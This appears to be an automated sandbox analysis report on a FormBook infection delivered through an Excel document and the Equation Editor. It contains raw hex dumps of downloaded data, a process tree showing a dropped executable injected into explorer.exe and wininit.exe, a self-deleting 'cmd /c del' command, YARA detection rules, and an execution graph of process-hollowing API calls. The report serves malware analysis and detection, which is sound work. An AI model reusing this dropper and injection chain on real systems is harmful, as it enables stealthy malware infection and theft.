                                              2022-01-14 15:04:36 UTC432INData Raw: f0 8b d2 ca 6d 6e 24 ae 50 b9 eb 8a aa 20 e7 1e d1 10 e6 fa 76 ea 84 2f cb d7 35 61 11 f1 b3 46 ce b0 73 a9 0a 41 0b f5 fc 2e 08 13 77 5d 8f f9 0e 3d d9 9d 83 48 18 a9 f0 f3 32 df 49 c5 5a 81 46 ad 79 7c 2d 58 9b 5b f6 94 1e bd bc 8f e2 1a 44 99 44 b3 0a df 25 18 cf b8 26 88 61 6a 4e dd 5b 42 e6 05 d8 e1 60 fc 54 3c 6a d0 d1 42 1d ed 69 cf 1d 47 86 ca d5 4d ea 72 77 50 b0 06 b1 ad c3 20 5f c2 75 20 3e 8d 09 8a 50 e1 aa 20 1b db 37 c7 6b b4 35 cd b3 7d 9e f2 e9 a0 39 36 22 cc 19 7d 33 c4 83 89 01 71 6e b7 f6 43 6b 6f 02 80 e0 49 38 ae 84 15 b3 81 59 32 50 65 9d 55 68 64 0e c9 f5 7c 9c 53 64 64 78 93 60 85 1c 8d 94 bc 60 53 84 8a d3 ee 08 2f cc ae a2 86 5e 56 de b3 a2 07 30 a4 3f a9 1b 16 d0 8a 8e db 26 86 fb 58 91 95 a3 75 c1 70 74 d3 d6 a6 06 c2 7e 2e 69
                                              Data Ascii: mn$P v/5aFsA.w]=H2IZFy|-X[DD%&ajN[B`T<jBiGMrwP _u >P 7k5}96"}3qnCkoI8Y2PeUhd|Sddx``S/^V0?&Xupt~.i
                                              2022-01-14 15:04:36 UTC448INData Raw: 36 3d 23 5e d5 0d d7 c3 76 84 8f a8 c2 48 16 36 9f 66 bc 46 b1 05 82 d0 74 a4 a2 59 03 4b 4b 25 d2 71 0e 1d 35 33 e6 20 ce d6 92 44 c3 1c ef 36 7b 9a be 75 12 a8 9f 64 8f 23 f2 8d 72 ed ce 9f 5c eb db b6 a6 ac 66 b5 08 47 a7 1d f3 40 33 d3 14 9d 53 66 77 27 bf 17 15 2f 30 9c 99 43 4b 92 ac 2e 25 c0 d5 57 d1 be a7 77 32 56 8c 0e ea 5e e3 45 52 0c c3 0d c6 da 6e f0 94 bc d3 bb 90 a9 09 b7 cc e6 a3 b6 c9 c7 f3 e1 99 dd ac a8 0e 5e db 12 f6 45 28 ab 35 44 07 16 4a 84 37 40 0b c4 24 1d 57 f0 48 96 1a 2f ec 33 59 12 1e b6 1b b2 09 5c b0 ac 2d 2d 47 8a 83 05 33 ce 62 6c e8 19 c0 98 aa 00 75 00 13 d0 de 87 f9 1b b1 e9 a0 e1 89 c5 63 3d f4 30 04 04 00 83 3e e5 bd 3e 6a 50 20 6d 8e 07 6e 3b 76 6c 6f 25 27 79 6d eb 9c 75 23 69 9c 8d 34 03 65 3c 06 9a 10 4e 8b 9d 09
                                              Data Ascii: 6=#^vH6fFtYKK%q53 D6{ud#r\fG@3Sfw'/0CK.%Ww2V^ERn^E(5DJ7@$WH/3Y\--G3bluc=0>>jP mn;vlo%'ymu#i4e<N
                                              2022-01-14 15:04:36 UTC464INData Raw: 53 69 88 57 36 59 c4 03 67 49 16 91 58 44 64 23 29 9a b7 a2 e1 94 60 22 6a 43 39 f3 9a 51 d9 41 76 d7 17 13 4d 3a d4 57 f6 b4 f8 dd f0 a4 2a b3 78 bf f7 55 09 d1 5f 7c 08 7c f8 d1 77 7b b3 c3 a3 37 7d f9 2f be f3 cf ff ef 97 32 65 15 cf f2 f6 1f 7e 70 5b 7d d1 c1 fd 1f 8c d0 3b 80 cd 1b 40 42 83 d5 50 79 a2 99 a3 0d d6 23 ef a5 93 be ce ff 13 ac 76 2f 64 ff 0a 10 de ad 3b 9d 96 6d 34 08 d1 40 03 10 d7 5b 37 fa ff bb 3d f8 5f 34 9b fa de 5b 5a 9e 1d 24 87 d7 0c ff 36 9d 81 a0 80 85 d3 a5 5b 67 1a 0f 9f 2d d1 09 09 4f bb 13 74 ac 71 9d dc fa ad 88 5f a1 8f 49 8f dd 4a 4a b3 dc 17 d0 05 f6 fd 25 7d 0c 80 54 57 ed 34 48 7d e0 33 11 15 ed b3 a2 9e e3 a0 77 23 29 66 65 ed 4b fb 77 c9 c7 ee 01 66 e0 2b 4f 92 c0 1f 3e 46 02 3f fa 28 d6 58 41 a8 4b dc 1b ee 35 05
                                              Data Ascii: SiW6YgIXDd#)`"jC9QAvM:W*xU_||w{7}/2e~p[};@BPy#v/d;m4@[7=_4[Z$6[g-Otq_IJJ%}TW4H}3w#)feKwf+O>F?(XAK5
                                              2022-01-14 15:04:36 UTC480INData Raw: 26 bb 30 b3 08 f9 47 b0 a4 1b 62 7b e7 4c f7 83 24 a8 28 53 00 06 af 49 36 44 b0 9d cf 10 ef ad 89 31 0b 82 75 88 01 90 00 2a b2 61 c4 1f ee c0 a5 c4 5d c9 77 61 7c 84 84 c3 c9 b4 50 60 75 87 4f 3f a9 7a 8c d0 00 24 4b 79 fc 6e fb 18 e9 88 77 ec 16 3f bf d3 86 53 57 2f ac bc 28 f4 a2 0e 77 75 b0 5b be 43 76 ae b9 7b f0 73 f7 49 30 23 97 e5 bc 73 67 7f 78 14 d7 55 81 f7 00 d8 e7 36 92 90 f4 a5 40 fe b1 5d 83 08 1f 46 66 65 11 3f 7f 4d 00 a3 98 04 47 da ae 65 d8 01 01 62 a3 1b e0 c7 ee 7e fe 73 f7 ff f5 62 f7 79 80 ee 1e f0 e6 c1 5b 4d 6f 06 b0 d7 e0 12 df 23 f5 d7 57 5e b1 78 05 21 03 49 80 7a d7 c5 6b 17 c0 ef 8c f0 fa ce ba f0 af cf 59 17 26 2b e2 df b8 33 85 96 8b 2f 5d 72 08 19 48 21 c0 aa d5 9c 2b c9 ee 36 4b 6b 42 15 b3 06 39 01 a1 9e 3d b2 56 24 35
                                              Data Ascii: &0Gb{L$(SI6D1u*a]wa|P`uO?z$Kynw?SW/(wu[Cv{sI0#sgxU6@]Ffe?MGeb~sby[Mo#W^x!IzkY&+3/]rH!+6KkB9=V$5
                                              2022-01-14 15:04:36 UTC496INData Raw: 09 e9 56 27 ce 71 a1 c3 74 59 e0 92 00 b0 0f fe 36 71 ad 9f dd dc 3d f8 32 01 c6 d9 8e 2d 09 ac 7f 82 90 81 ca d2 6f 12 32 10 c7 99 cf 15 d7 73 4f fd f2 0a f8 e2 3b f1 6d ee 73 e1 67 9e 4b 5d f8 4e fb 78 ef f2 a7 f0 ff 20 64 e0 11 01 56 43 75 d7 54 e3 b6 18 43 b4 af 5a c8 01 60 43 f7 e1 15 0f 2e 5e 4b 2c a2 05 9c 12 dd 7a 16 f8 ae 47 7f 17 3c 0a 9c 02 40 79 60 38 1f 43 51 56 df b5 c6 11 0c c1 dd 05 31 ae 28 b9 e7 8a 95 7c 3c b6 06 25 e4 ec c7 f3 6b 56 19 be 01 ad ff 7f 5d bd 09 94 2b 79 7d df db 2d 05 d3 da f7 ad 5b 25 75 6b 01 95 4a a5 d2 be 74 6b 19 ba 5b a3 7d df 55 ba d2 4c b7 34 da f7 d2 56 d2 48 0e 9e 4b 4e fc 60 e2 b1 1d 3b c9 61 0b be c6 cf c1 e4 d9 31 18 82 f1 f8 e1 00 e3 d8 38 0e 89 1d ec 40 62 68 30 0f 78 06 1f fb 9d 38 26 d8 f0 aa 74 07 27 99
                                              Data Ascii: V'qtY6q=2-o2sO;msgK]Nx dVCuTCZ`C.^K,zG<@y`8CQV1(|<%kV]+y}-[%ukJtk[}UL4VHKN`;a18@bh0x8&t'
                                              2022-01-14 15:04:36 UTC512INData Raw: e7 c8 cf c8 d8 94 e7 94 2b b7 f5 be d1 a6 21 7b 94 aa 3e eb 45 53 9f f9 82 69 cc 7e d1 34 39 d5 65 3e 67 6a af 3e 27 8f 89 e4 b8 fe da 73 a6 41 8e 1b 32 9f 95 db cf ca 63 cf 98 9a 2b 4f 9b 7a 19 eb 33 9f 31 75 72 dc 94 3f d5 dc 6a 3b 6e ca ae ad 30 1b 27 7d d5 43 60 59 4f 7f ce ef 01 e0 ee 00 f8 35 36 f0 4c 7e e4 d7 6f 2d 7e f6 bf 9a dc 6b 93 cd e9 d7 7f d6 09 00 27 77 de ef 4a 80 8f 02 00 c3 ba 00 c0 30 93 7b 31 06 00 97 86 77 02 40 59 ce 14 73 a3 3d cb b4 35 9d 13 00 ac 53 d5 a9 00 80 d7 06 3b 62 fe 72 0f 00 cc bf c1 69 63 04 00 95 40 20 a2 96 10 10 5a 05 04 16 00 9b 2d 04 6a 2c 08 d4 fc 01 00 b6 38 00 c8 a8 02 00 a2 ba 68 75 08 04 2c 00 d2 a3 01 b0 4e 00 b0 bb 9f 79 fb f5 01 e6 f4 81 78 73 fa 20 10 18 2c 7f df a1 0e 00 c3 cd c5 13 62 7e 01 c0 e5 33 4f
                                              Data Ascii: +!{>ESi~49e>gj>'sA2c+Oz31ur?j;n0'}C`YO56L~o-~k'wJ0{1w@Ys=5S;bric@ Z-j,8hu,Nyxs ,b~3O
                                              2022-01-14 15:04:36 UTC528INData Raw: b4 37 ec 0f ce 05 e0 aa c0 cc f2 c4 70 5f 9b d3 e9 27 89 b2 2a 80 f1 99 f5 01 04 7d 02 62 bd df fc 03 10 80 04 cf f5 df 07 c8 eb 60 6c 1e c3 ec bc 1e 50 c1 f4 03 06 0c 88 bb ef be fb 74 15 81 9f a1 a4 e0 98 f7 a1 77 e0 bf 88 04 08 50 06 b0 c4 c8 49 4a 00 c9 b8 dd 84 3d 6e d4 6e 54 6f f9 20 e8 45 41 e7 0d ff 4c a7 04 70 c6 6f 04 ca 9c 64 2e 76 02 c0 b8 4e 00 c8 4e f7 09 20 41 57 03 02 00 9c 8d 0f 01 c0 97 00 f1 d6 fc e7 13 22 7d 80 a0 14 70 29 40 93 40 42 d0 08 0c 9b 9f 14 90 e7 cc 9f 9f ea 01 30 58 01 50 5d c0 d7 81 7b 00 8c b7 d2 52 00 f3 a3 f1 02 80 09 02 00 51 ce 04 05 41 18 00 51 10 50 00 88 30 7e de a4 18 00 58 35 a9 1c 00 c2 20 28 8a a8 55 21 30 55 00 30 55 37 05 dd 8a 49 00 fb b7 ce d6 73 01 fc 05 41 30 3e 00 f0 97 05 f7 3b 01 3d 04 fc 25 c1 fc 85
                                              Data Ascii: 7p_'*}b`lPtwPIJ=nnTo EALpod.vNN AW"}p)@@B0XP]{RQAQP0~X5 (U!0U0U7IsA0>;=%
                                              2022-01-14 15:04:36 UTC544INData Raw: 56 00 2c 8a 01 40 46 7c 0f 80 3e d9 01 b0 3c 13 00 fa a7 03 c0 1c 00 35 80 55 40 60 80 8a bf 79 8d af 01 68 43 d0 9a 01 c9 b3 01 11 00 82 03 08 b1 0b f1 a7 02 60 9d 87 c0 fe f5 25 2d 00 60 78 76 00 20 7e f9 39 13 00 e2 e2 3f 15 07 80 c4 e9 10 67 08 05 40 59 12 00 ce a6 01 a0 4c d2 81 32 f7 e5 89 77 dc b7 e2 04 9a d7 3c 24 2e e0 06 b7 f8 95 1e 6e ee 07 2f 38 c9 93 a3 bb 07 59 3d 80 db 87 d9 5d 84 6d c5 20 2b 05 b9 7b 10 a9 00 a2 8f 0b df 0a 84 fc 8c 03 00 00 a3 4a f3 dc 33 77 ff 87 9b f3 62 47 57 27 0e 60 9f 8c f2 08 1e 00 1c 94 d1 1f 37 60 10 b8 70 e8 0d 77 e1 d8 0c 37 fb 59 2f fe 57 27 ff 64 e3 fc 97 fb fd 7f e4 cc 54 d0 11 24 15 74 44 66 5b 71 31 c0 d0 a1 c7 0c 00 c2 22 0f b7 bd fc c9 bf 19 75 11 22 f0 70 29 5d 7a c0 84 d1 9d f7 31 6a 5b f1 8e 74 20 3e
                                              Data Ascii: V,@F|><5U@`yhC`%-`xv ~9?g@YL2w<$.n/8Y=]m +{J3wbGW'`7`pw7Y/W'dT$tDf[q1"u"p)]z1j[t >
                                              2022-01-14 15:04:36 UTC560INData Raw: 43 27 20 85 bb a2 a2 22 15 0e 45 3d fa ee 11 9f 8d b0 08 1f 11 fd ff dd 9d 07 98 54 e5 f9 f6 63 12 54 32 db 80 65 e9 bd 2c 1d 76 91 de ab 28 bd 2e bd 97 58 40 01 15 44 14 05 c1 42 94 22 60 85 d8 50 10 e9 8a 15 14 8d 05 45 50 8a 80 a0 a0 c6 1a a3 51 34 89 20 be df fd 7b 67 9e e1 ec b2 0b 0b ec 66 fd 7f 5c d7 cb ec cc 9c 36 e7 9c fb 7e ee a7 bc cf 21 1a 8f 85 47 15 10 8c 03 e0 c8 70 a2 e9 d4 11 10 78 c3 4a 63 b1 51 0a 04 a0 b9 ff 50 04 c1 2a 3c de 43 28 6c 8b ef d9 2e a9 40 a4 3e d2 1f a0 12 bc 03 fc 90 10 cb 10 a8 04 e4 a4 f2 00 2f df 31 ac c1 87 3d e9 87 ef 20 8c e0 13 85 70 63 c8 f9 f3 1d 9f a3 36 f8 7d c4 2e f2 1c a8 b9 35 c8 02 d0 15 98 13 47 1a 30 4a 00 9b 27 fa 0a bf 74 0a e0 6c 09 40 ef 19 db d6 f7 f2 24 70 02 01 3c d5 c7 cb ff 53 11 c0 ae 67 c2 e0
                                              Data Ascii: C' "E=TcT2e,v(.X@DB"`PEPQ4 {gf\6~!GpxJcQP*<C(l.@>/1= pc6}.5G0J'tl@$p<Sg
                                              2022-01-14 15:04:36 UTC576INData Raw: 6f c4 08 48 fe fd a2 45 8b 62 04 1a ff 7d c6 21 a0 c4 b0 be 40 1e 33 6f de bc 18 91 48 48 9f 79 ab 8e b4 9f 3b 77 6e 48 56 34 24 d0 10 e0 0b c9 02 87 90 dd 54 ec 51 d4 43 6c 09 ab 0c 08 01 3c 16 98 ef e8 18 64 8d 3c b1 e8 14 06 61 d5 f1 bd 49 df 51 cb cf 6c 3e fc fb b4 b4 34 6f fd 89 0d 50 1b 60 6d c1 70 0b 00 2a ef c9 1c e0 ef 13 cd c7 0d a0 b2 10 1f 9e 18 03 d6 9f 65 99 58 44 e9 31 99 00 48 80 e3 a4 10 09 b2 e1 3d 92 df a6 2d b3 1e b1 0a f6 87 0a b1 ce c1 90 43 9e 83 3d 07 09 20 1d 11 dc 79 e7 9d f9 c5 a8 b1 c4 02 24 b5 60 7f 6a 03 0a e8 82 14 44 02 32 50 05 48 45 91 82 27 02 f9 89 45 e4 3f 16 c3 77 d4 7a 64 0e 08 12 95 a6 54 54 80 2f 4b 3d 01 33 0b e5 2e 54 90 1b 41 3a b1 12 15 24 02 6f b2 14 43 15 11 42 55 b9 0a 64 14 6a 10 43 a0 e4 54 ee 42 6d 29 82
                                              Data Ascii: oHEb}!@3oHHy;wnHV4$TQCl<d<aIQl>4oP`mp*eXD1H=-C= y$`jD2PHE'E?wzdTT/K=3.TA:$oCBUdjCTBm)


                                              Code Manipulations

                                              Statistics

                                              CPU Usage

                                              Click to jump to process

                                              Memory Usage

                                              Click to jump to process

                                              High Level Behavior Distribution

                                              Click to dive into process behavior distribution

                                              Behavior

                                              Click to jump to process

                                              System Behavior

                                              Analysis Process: EXCEL.EXE PID: 1928 Parent PID: 596

                                              General

                                              Start time:16:03:27
                                              Start date:14/01/2022
                                              Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                                              Imagebase:0x13fa90000
                                              File size:28253536 bytes
                                              MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high

                                              Chronological Activities

                                              Analysis Process: EQNEDT32.EXE PID: 2568 Parent PID: 596

                                              General

                                              Start time:16:03:46
                                              Start date:14/01/2022
                                              Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                                              Imagebase:0x400000
                                              File size:543304 bytes
                                              MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high

                                              Chronological Activities

                                              Analysis Process: Pcportk28.exe PID: 2124 Parent PID: 2568

                                              General

                                              Start time:16:03:50
                                              Start date:14/01/2022
                                              Path:C:\Users\Public\Pcportk28.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Users\Public\Pcportk28.exe
                                              Imagebase:0x10e0000
                                              File size:601600 bytes
                                              MD5 hash:25EE51200E7D86AB2C531748E5C01C72
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:.Net C# or VB.NET
                                              Yara matches:
                                              • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000004.00000002.486571220.0000000002581000.00000004.00000001.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.486832493.0000000003589000.00000004.00000001.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.486832493.0000000003589000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.486832493.0000000003589000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000004.00000002.486604064.00000000025B1000.00000004.00000001.sdmp, Author: Joe Security
                                              Antivirus matches:
                                              • Detection: 100%, Joe Sandbox ML
                                              Reputation:low

                                              Chronological Activities

                                              Analysis Process: Pcportk28.exe PID: 1964 Parent PID: 2124

                                              General

                                              Start time:16:03:54
                                              Start date:14/01/2022
                                              Path:C:\Users\Public\Pcportk28.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Users\Public\Pcportk28.exe
                                              Imagebase:0x10e0000
                                              File size:601600 bytes
                                              MD5 hash:25EE51200E7D86AB2C531748E5C01C72
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.484507114.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.484507114.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.484507114.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.484190215.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.484190215.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.484190215.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.519475611.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.519475611.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.519475611.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.519314819.0000000000320000.00000040.00020000.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.519314819.0000000000320000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.519314819.0000000000320000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.519405441.0000000000350000.00000040.00020000.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.519405441.0000000000350000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.519405441.0000000000350000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                              Reputation:low

                                              Chronological Activities

                                              Analysis Process: explorer.exe PID: 1764 Parent PID: 1964

                                              General

                                              Start time:16:03:56
                                              Start date:14/01/2022
                                              Path:C:\Windows\explorer.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\Explorer.EXE
                                              Imagebase:0xffa10000
                                              File size:3229696 bytes
                                              MD5 hash:38AE1B3C38FAEF56FE4907922F0385BA
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000000.510593702.00000000098A9000.00000040.00020000.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000000.510593702.00000000098A9000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000000.510593702.00000000098A9000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000000.502411126.00000000098A9000.00000040.00020000.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000000.502411126.00000000098A9000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000000.502411126.00000000098A9000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                              Reputation:high

                                              Chronological Activities

                                              Analysis Process: wininit.exe PID: 1760 Parent PID: 1764

                                              General

                                              Start time:16:04:07
                                              Start date:14/01/2022
                                              Path:C:\Windows\SysWOW64\wininit.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Windows\SysWOW64\wininit.exe
                                              Imagebase:0x6f0000
                                              File size:96256 bytes
                                              MD5 hash:B5C5DCAD3899512020D135600129D665
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.691732540.0000000000190000.00000040.00020000.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.691732540.0000000000190000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.691732540.0000000000190000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.691708361.00000000000E0000.00000040.00020000.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.691708361.00000000000E0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.691708361.00000000000E0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.691749486.00000000001C0000.00000004.00000001.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.691749486.00000000001C0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.691749486.00000000001C0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              Reputation:moderate

                                              Chronological Activities

                                              Analysis Process: cmd.exe PID: 2564 Parent PID: 1760

                                              General

                                              Start time:16:04:12
                                              Start date:14/01/2022
                                              Path:C:\Windows\SysWOW64\cmd.exe
                                              Wow64 process (32bit):true
                                              Commandline:/c del "C:\Users\Public\Pcportk28.exe"
                                              Imagebase:0x4a4c0000
                                              File size:302592 bytes
                                              MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high

                                              Chronological Activities

                                              Disassembly

                                              Code Analysis

                                              Reset < >

                                                Analysis Process: Pcportk28.exe PID: 2124 Parent PID: 2568 Pcportk28.exeCOMMON

                                                Execution Graph

                                                Execution Coverage:15.8%
                                                Dynamic/Decrypted Code Coverage:100%
                                                Signature Coverage:7.3%
                                                Total number of Nodes:150
                                                Total number of Limit Nodes:25

                                                Graph

                                                execution_graph 7486 9e02e2 7487 9e017e 7486->7487 7488 9e05fc 7487->7488 7489 9e0c19 6 API calls 7487->7489 7489->7487 7294 9e0591 7296 9e017e 7294->7296 7295 9e05fa 7296->7295 7298 9e0c19 7296->7298 7299 9e0c42 7298->7299 7303 9e0c88 7299->7303 7307 9e0c83 7299->7307 7300 9e0c70 7300->7296 7304 9e0ca5 7303->7304 7311 9e1111 7304->7311 7308 9e0ca5 7307->7308 7310 9e1111 6 API calls 7308->7310 7309 9e0ce5 7309->7300 7310->7309 7312 9e113a 7311->7312 7335 9e11ab 7312->7335 7347 9e1cca 7312->7347 7351 9e120e 7312->7351 7363 9e17d1 7312->7363 7370 9e1a73 7312->7370 7374 9e1675 7312->7374 7379 9e1b77 7312->7379 7384 9e1956 7312->7384 7388 9e1876 7312->7388 7393 9e1779 7312->7393 7397 9e1598 7312->7397 7403 9e1438 7312->7403 7407 9e1b5a 7312->7407 7411 9e1bda 7312->7411 7418 9e17ff 7312->7418 7422 9e15e3 7312->7422 7426 9e1742 7312->7426 7430 9e1aa2 7312->7430 7434 9e1842 7312->7434 7438 9e17a6 7312->7438 7442 9e1bc6 7312->7442 7313 9e0ce5 7313->7300 7337 9e11b8 7335->7337 7336 9e12f8 7336->7313 7337->7336 7446 35fa38 7337->7446 7338 9e13a2 7340 9e1428 7338->7340 7346 35f448 Wow64SetThreadContext 7338->7346 7339 9e1402 7339->7340 7343 9e2128 ResumeThread 7339->7343 7344 9e2117 ResumeThread 7339->7344 7341 9e19b2 7340->7341 7345 35f6a0 WriteProcessMemory 7340->7345 7341->7313 7343->7340 7344->7340 7345->7340 7346->7339 7348 9e1ce7 7347->7348 7450 35f6a0 7348->7450 7354 9e121b 7351->7354 7352 9e12f8 7352->7313 7353 9e13a2 7357 9e1428 7353->7357 7454 35f448 7353->7454 7354->7352 7360 35fa38 CreateProcessA 7354->7360 7356 9e19b2 7356->7313 7357->7356 7358 35f6a0 WriteProcessMemory 7357->7358 7358->7357 7360->7353 7364 9e17db 7363->7364 7368 9e2128 ResumeThread 7364->7368 7369 9e2117 ResumeThread 7364->7369 7365 9e1c1c 7366 9e19b2 7365->7366 7367 35f6a0 WriteProcessMemory 7365->7367 7366->7313 7367->7365 7368->7365 7369->7365 7371 9e1a79 7370->7371 7372 9e19b2 7371->7372 7373 35f6a0 WriteProcessMemory 7371->7373 7372->7313 7373->7371 7470 35f800 7374->7470 7375 9e153b 7376 9e19b2 7375->7376 7377 35f6a0 WriteProcessMemory 7375->7377 7376->7313 7377->7375 7380 9e1e61 7379->7380 7381 9e1b84 7379->7381 7380->7313 7382 9e19b2 7381->7382 7383 35f6a0 WriteProcessMemory 7381->7383 7382->7313 7383->7381 7385 9e1968 7384->7385 7386 9e19b2 7385->7386 7387 35f6a0 WriteProcessMemory 7385->7387 7386->7313 7387->7385 7392 35f6a0 WriteProcessMemory 7388->7392 7389 9e189a 7390 9e19b2 7389->7390 7391 35f6a0 WriteProcessMemory 7389->7391 7390->7313 7391->7389 7392->7389 7394 9e178f 7393->7394 7395 9e19b2 7394->7395 7396 35f6a0 WriteProcessMemory 7394->7396 7395->7313 7396->7394 7474 9e2058 7397->7474 7478 9e2048 7397->7478 7398 9e15b4 7399 9e19b2 7398->7399 7400 35f6a0 WriteProcessMemory 7398->7400 7399->7313 7400->7398 7404 9e1442 7403->7404 7405 9e19b2 7404->7405 7406 35f6a0 WriteProcessMemory 7404->7406 7405->7313 7406->7404 7408 9e145e 7407->7408 7409 9e19b2 7408->7409 7410 35f6a0 WriteProcessMemory 7408->7410 7409->7313 7410->7408 7412 9e1be3 7411->7412 7416 9e2128 ResumeThread 7412->7416 7417 9e2117 ResumeThread 7412->7417 7413 9e1c1c 7414 9e19b2 7413->7414 7415 35f6a0 WriteProcessMemory 7413->7415 7414->7313 7415->7413 7416->7413 7417->7413 7419 9e1819 7418->7419 7420 9e19b2 7419->7420 7421 35f6a0 WriteProcessMemory 7419->7421 7420->7313 7421->7419 7423 9e15ef 7422->7423 7424 9e19b2 7423->7424 7425 35f6a0 WriteProcessMemory 7423->7425 7424->7313 7425->7423 7427 9e174f 7426->7427 7428 9e19b2 7427->7428 7429 35f6a0 WriteProcessMemory 7427->7429 7428->7313 7429->7427 7431 9e1aac 7430->7431 7432 9e19b2 7431->7432 7433 35f6a0 WriteProcessMemory 7431->7433 7432->7313 7433->7431 7435 9e1854 7434->7435 7436 9e19b2 7435->7436 7437 35f6a0 